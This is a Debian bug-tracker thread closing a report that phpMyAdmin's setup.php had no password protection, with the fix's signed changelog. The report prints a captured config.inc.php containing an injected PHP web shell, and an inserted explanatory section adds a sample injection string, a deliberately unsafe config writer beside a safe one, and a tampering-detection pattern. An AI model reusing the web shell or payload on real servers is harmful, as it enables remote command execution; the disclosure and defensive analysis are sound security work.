Your message dated Sun, 25 Oct 2009 19:57:41 +0000
with message-id <[email protected]>
and subject line Bug#543460: fixed in phpmyadmin 4:2.11.8.1-5+lenny3
has caused the Debian Bug report #543460,
regarding phpmyadmin: No password protection for setup.php script
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole

After install, you can access http://{host}/phpmyadmin/scripts/setup.php
without entering any password.
By adding a new host in the configuration, an attacker can submit malicious code
to execute commands as the www-data user.

This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo 
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */


-- System Information:
Debian Release: 4.0
  APT prefers oldstable
  APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)

Versions of packages phpmyadmin depends on:
ii  debconf [debconf-2.0 1.5.11etch2         Debian configuration management sy
ii  libapache2-mod-php5  5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti
ii  perl                 5.8.8-7etch6        Larry Wall's Practical Extraction 
ii  php5-mysql           5.2.0+dfsg-8+etch15 MySQL module for php5
ii  ucf                  2.0020              Update Configuration File: preserv

Versions of packages phpmyadmin recommends:
ii  apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD
pn  php5-gd | php4-gd         <none>         (no description available)
pn  php5-mcrypt | php4-mcrypt <none>         (no description available)

-- debconf information:
  phpmyadmin/setup-username: admin
  phpmyadmin/reconfigure-webserver:
  phpmyadmin/restart-webserver: false



--- End Message ---
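The dump above shows the mechanism: the setup script wrote the submitted "host" value straight into a single-quoted PHP literal in config.inc.php, so a value beginning with a quote closed the literal and the remainder was saved as executable code. The following is an added example, not phpMyAdmin's own code and not part of the report; the function names, the allowlist and the tampering check are illustrative. It places the vulnerable writer beside a hardened one that serialises the value with var_export(), and adds two checks a practitioner would want: an input allowlist applied before the writer, and a grep-style test for an already-modified config file.

```php
<?php
// Added example (not phpMyAdmin code). Demonstrates the config-writer
// injection described in the bug report and a hardened equivalent.

// Attacker-supplied host value, modelled on the dump in the report (constructed).
$evil_host = "'; if(\$_GET['c']){system(\$_GET['c']);}//";

// Vulnerable pattern: raw interpolation of user input into a single-quoted
// PHP string literal. A single quote in the input closes the literal and the
// rest of the value lands in config.inc.php as code that runs on every load.
function render_server_unsafe(string $host): string
{
    return "\$cfg['Servers'][\$i]['host'] = '" . $host . "';\n";
}

// Hardened pattern: var_export() emits a valid PHP literal with embedded
// quotes and backslashes escaped, so the value cannot leave string context.
function render_server_safe(string $host): string
{
    return "\$cfg['Servers'][\$i]['host'] = " . var_export($host, true) . ";\n";
}

// Defence in depth (illustrative allowlist): a host name, IPv4 or bracketed
// IPv6 address never needs quotes, semicolons or parentheses, so reject
// anything outside a conservative character set before it reaches the writer.
function is_plausible_host(string $host): bool
{
    return (bool) preg_match('/^[A-Za-z0-9.\-:\[\]]{1,253}$/', $host);
}

// Integrity check for an existing config.inc.php (illustrative): a legitimate
// phpMyAdmin config contains no command-execution calls and no request
// superglobals, so any hit deserves a manual look.
function looks_tampered(string $config_source): bool
{
    $pattern = '/\b(system|eval|exec|passthru|shell_exec)\s*\(|\$_(GET|POST|REQUEST)\b/';
    return (bool) preg_match($pattern, $config_source);
}

echo "Unsafe writer produced:\n" . render_server_unsafe($evil_host);
echo "Safe writer produced:\n" . render_server_safe($evil_host);
echo "Allowlist accepts 'localhost': "
    . var_export(is_plausible_host('localhost'), true) . "\n";
echo "Allowlist accepts payload: "
    . var_export(is_plausible_host($evil_host), true) . "\n";
echo "Unsafe output flagged as tampered: "
    . var_export(looks_tampered(render_server_unsafe($evil_host)), true) . "\n";
echo "Benign config line flagged as tampered: "
    . var_export(looks_tampered(render_server_safe('localhost')), true) . "\n";
```

Run it with `php example.php`. Escaping the literal fixes the injection sink, but the allowlist matters too: a value like the one above has no business being a host name at all, and rejecting it early keeps a future writer bug from becoming code execution. Independently of the writer, a setup script that can rewrite config.inc.php should not be reachable without authentication after installation; the Debian fix described later in this thread takes that route, allowing the script to save configuration only after explicit action by the administrator.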
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:2.11.8.1-5+lenny3

We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:

phpmyadmin_2.11.8.1-5+lenny3.diff.gz
  to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.diff.gz
phpmyadmin_2.11.8.1-5+lenny3.dsc
  to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3.dsc
phpmyadmin_2.11.8.1-5+lenny3_all.deb
  to pool/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny3_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thijs Kinkhorst <[email protected]> (supplier of updated phpmyadmin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 25 Oct 2009 12:30:40 +0100
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:2.11.8.1-5+lenny3
Distribution: stable-security
Urgency: high
Maintainer: Thijs Kinkhorst <[email protected]>
Changed-By: Thijs Kinkhorst <[email protected]>
Description: 
 phpmyadmin - MySQL web administration tool
Closes: 535044 543460 552194
Changes: 
 phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low
 .
   * Correct some documentation issues of new script.
 .
 phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high
 .
   * Upload to stable to fix security issues.
   * Fixes XSS and SQL injection (Closes: #552194).
     [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697]
   * Allow saving of configuration from setup script only after explicit action
     from administrator (Closes: #535044, #543460).
Checksums-Sha1: 
 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
 e73e24d04b0c73386de7ae4e112227d17eae7d98 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
 c90b5b5168330a0a8e4eeba1c0aea405e7e1a472 2883628 phpmyadmin_2.11.8.1-5+lenny3_all.deb
Checksums-Sha256: 
 7d53fc216fd8b99ea440b72870ff018527b189cce5242618e4baeb2853123ff2 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc
 e5fc26908652779a12d91652ac2c270c583b1922a338139b9a231cee910911bd 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
 ae37df4ffc3f6f8c1365d589edd8a255a37ddc1d97b0e9ea0752db72d3a9d7d3 2883628 phpmyadmin_2.11.8.1-5+lenny3_all.deb
Files: 
 db7c29dbd8ad5758ea8283ebbde9c611 1547 web extra phpmyadmin_2.11.8.1-5+lenny3.dsc
 a3c38a698e954534517a81570e9fc9fa 63773 web extra phpmyadmin_2.11.8.1-5+lenny3.diff.gz
 da6a70575f8ae6608910a1c5aaf81f1c 2883628 web extra phpmyadmin_2.11.8.1-5+lenny3_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJK5DiKAAoJECIIoQCMVaAcUOsH/iW+RHo9EJjjiuBmz6/T/quz
TxeSQiporVxM2ibMcdU8Xa5KecrQxwkAU5gtzdusoe6Xe+Tr8twgch2T1pl/mqmO
vIpZrLrnwsr+Pb5ofH1jpB5FcIc//GcJ81gQ9y7Vf54Dj2j1tZ1iVc+ViWrIhRBC
1bLKP4UXs6MnC2QHa6agIoOliwuD1FJMRtn4RRe9emV6ReBXno3x0MvJULlxE0C7
aVdN9pd05bf8NQfl9Gk+QqimQqNuQZE/PNdSl+XuzIaY0BBBvZEYq7J3VgEsINNU
Mze8qQKSdXEbNcDbF/LyfRwNo1LYcygg06P0lRI8chML8To7yHHq7BuGFmFToNA=
=fYxY
-----END PGP SIGNATURE-----



--- End Message ---